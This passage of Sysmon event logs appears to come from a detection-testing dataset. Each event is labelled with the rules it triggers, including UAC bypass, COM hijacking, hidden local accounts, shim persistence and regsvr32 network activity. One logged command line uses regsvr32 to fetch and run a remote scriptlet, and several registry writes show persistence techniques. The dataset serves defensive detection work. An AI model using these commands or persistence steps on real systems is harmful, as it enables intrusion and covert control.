14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution_attributes":{"ProcessID":1744,"ThreadID":2120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution_attributes":{"ProcessID":3552,"ThreadID":5004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution_attributes":{"ProcessID":276,"ThreadID":1000},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 